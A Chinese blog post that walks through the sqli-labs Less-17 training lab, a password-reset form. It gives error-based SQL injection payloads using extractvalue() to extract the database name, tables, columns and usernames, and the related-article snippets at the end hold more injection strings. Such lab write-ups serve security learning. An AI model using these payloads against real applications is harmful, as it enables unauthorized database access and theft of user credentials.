sqli-labs/Less-17

最新推荐文章于 2024-07-10 22:41:59 发布
最新推荐文章于 2024-07-10 22:41:59 发布
阅读量146 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127929642
版权

这一关的欢迎界面提示我们重置密码 可能是要我们对密码进行注入操作

所以我们这样做既然要重置的话 那么就要有正确的用户名

所以我们在用户名处输入正确的字符 然后再密码出进行注入 

首先判断一下密码处的注入点类型

输入如下

我们首先先试试看错误的时候会不会存在错误信息呢

1'

回显如下

提示我们注入点的结构为单引号注入

就不用验证了

接下来进行注入方法的选择 由于正确的用户名和密码输入后没有任何回显 所以就不能使用联合注入了 但是有报错注入 所以我们可以利用报错注入

首先先获取一下数据库名称

输入如下

1' and extractvalue(1,concat(0x7e,database(),0x7e));#

 回显如下

接着进行报表操作

输入如下

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#

 回显如下

接着进行获取字段的操作

输入如下

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),0x7e))#

 回显如下

最后获取一下用户名和密码的相关信息

输入如下

1' and extractvalue(1,concat(0x7e,(select user_name from (select group_concat(username) as user_name from users) as a),0x7e))#

 如果按照正常的写法来写 会报错 这条报错信息的解决办法为二次查询

回显如下

嘿嘿成功!! 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs 17
m0_69548793的博客
08-27 1308
sqli-labs 17
sqli-labs Less-18
qq_42630215的博客
05-04 772
LESS-18 POST - Header Injection -Uagent field - Error based 0x01. 随便测试几个查看有无回显 错误回显和正确回显都是显示IP地址 错误回显: 正确回显: 在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。 用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...
基于Sqli-Labs靶场的SQL注入-17~22关
Joker
01-03 1657
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
Sqli-labs之Less-17
m0_46315342的博客
06-04 624
                                          &nbs...
SQLI-LABS Less-17
Web学习之路
03-24 106
Update注入
floor报错注入的两种格式
aitong的博客
01-31 454
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs靶场详解(less17-less22)
m0_72125469的博客
11-26 421
sqli-labs靶场通关 sql注入-sqli-labs less-17 less-18 less-19 less-20 less-21 less-22 17关 18关 19关 20关 21关 22关
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
[网络安全]sqli-labs Less-17 解题详析
等风来
07-24 2287
以上为[网络安全]sqli-labs Less-17 解题详析,后续将分享[网络安全]sqli-labs Less-18 解题详析.我是秋说,我们下次见。
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1387
sqli-labs基础篇 第11~17
sqli-labs ————less -17
Fly_鹏程万里
05-12 860
Less-17源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqlilabs less-17
TA不懒,但还没有添加简介
07-05 237
sqlilabs less-17
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 724
继续学习sqli-labs,本篇是less17
sqli-labs-less17
qq_45106794的博客
10-23 829
#sqli-labs-less17 在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项 成功报错,说明passwd这一项可以进行注入 'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...
7.10飞书一面面经
最新发布
东篱君的博客
07-10 468
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
sqli-labs/Less-28
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值